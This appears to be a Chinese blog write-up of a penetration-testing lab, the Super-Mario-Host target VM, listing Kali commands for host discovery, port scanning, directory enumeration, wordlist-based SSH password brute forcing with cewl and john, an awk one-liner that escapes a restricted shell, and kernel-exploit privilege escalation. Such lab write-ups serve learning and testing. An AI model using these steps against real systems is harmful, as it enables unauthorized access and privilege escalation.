• kali渗透综合靶机(七)--Super-Mario-Host靶机


    kali渗透综合靶机(七)--Super-Mario-Host靶机

    靶机百度云下载  链接:https://pan.baidu.com/s/13l1FUgJjXArfoTOfcmPsbA 提取码:a8ox

    一、主机发现

    1.netdiscover -i eth0 -r 192.168.10.0/24

      

    二、端口扫描

    1. masscan --rate=10000 -p0-65535 192.168.10.160

      

    三、端口服务识别

    1.nmap -sV -T4 -O 192.168.10.160 -p 22,80

      

    四、漏洞发现与利用

    1.扫描网站目录

    Dirb http://192.168.10.161:8180

      

    2.发现http://192.168.10.161:8180/vhosts

      

    3. 在本地hosts文件添加解析记录

      

    4.浏览器访问http://mario.supermariohost.local:8180/,别的什么都没有

      

    5. 使用dirbuster扫描目录,扫描出来如下目录

      

    6. 发现http://mario.supermariohost.local:8180/luigi.php

      

    7. 发现http://mario.supermariohost.local:8180/command.php  测试luigi,发现存在

      

    8.使用cewl爬取站点下的可疑用户名作为用户名字典

    cewl http://mario.supermariohost.local:8180/ -d -w /root/user.txt

    9. john在该user的基础上生成相应社工密码进行爆破

    john --wordlist=user.txt --stdout --rules > passwd.txt

    10.爆破出密码,使用ssh登录,发现是受限的shell,使用awk调用系统命令,绕过限制

    awk ‘BEGIN{system(“/bin/bash”)}’

      

    11.查看内核版本,然后再kali使用searchsploit查找是否有exp

      

    12.开始提权,成功获得管理员权限

      

     

    总结:

    1.信息收集

    2.dirbuster、dirb扫描目录

    3.测试用户是否存在

    4.使用cewl爬取站点下的可疑用户名作为用户名字典

    5.john在该user的基础上生成相应社工密码进行爆破

    6.受用awk调用系统命令绕过受限的shell

    7.利用内核版本漏洞本地提权

  • 相关阅读:
    java jdk 安装后目录下没有 jre
    解决leader-line生成的svg线不能被html2canvas转成图片问题
    css 计数实现目录索引
    前端架构入门
    js 尺寸信息
    阿里云25端口被封,换465端口发送
    appache官网下载 httpClient
    oc基础:类的定义
    指针的地址(地址的地址)
    0 ‘与‘’、 ‘0’
  • 原文地址:https://www.cnblogs.com/yuzly/p/10801308.html
Copyright © 2020-2023  润新知